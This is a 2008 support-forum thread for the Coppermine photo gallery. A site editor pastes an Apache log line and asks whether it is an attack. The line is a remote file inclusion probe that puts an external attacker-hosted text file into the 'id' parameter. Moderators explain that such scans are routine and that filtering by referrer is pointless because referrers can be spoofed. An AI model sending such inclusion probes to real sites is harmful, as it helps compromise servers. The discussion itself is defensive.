I suppose it's security issue I suppose it's security issue
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

I suppose it's security issue

Started by natalina, September 14, 2008, 07:38:26 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

natalina

Hi I've just found something strange. My gallery' s index page is index.php & until yesterday I had login form & languagers bar. Occasionaly last night I found strange logs (apache)/ They look like: GET /architect_gallery/index.php?id=http://www.donche.net/donche.txt HTTP/1.1" 200 65612 "-" "Mozilla/3.0 (compatible; Indy Library)" So if u add id= http.bla.bla.com/ bla txt or php Coppermine think's it's OK. As a result u wiil see this strange referrer in your code not only in index page but everythere (if u have login form)/ Maybe I'm wrong (hope so!) but I'm afraid that this way somebody can inject some kind of virus to the site. File donche.txt  seems to me very suspicious. I' am editor & my knowledge is 2 poor but I decided to share my notices in order to prevent troubles. Sorry for my English :)

Nibbler

People scan for vulnerable websites all the time, don't worry about it.

natalina

Thank u so much :), but I would like to know if I can add to login.php something like  if referrer is "index.php id=http", $referer = "goaway.php" else if ......  Because of my poor php I can't write this condition properly (:

Joachim Müller

The attacker will stop sending referers if you check them.

natalina

Thank u :) I do check it but he (or they) have few addresses ( I discovered 4 sites)/ I' m afraid that he'll use another address. One of them is at geocity, another - phase-lm.co.uk etc...

Joachim Müller

The referer address can be spoofed (faked) or the attacker can set up his attacking script to just stop sending the referers at all. So there is no use in checking them.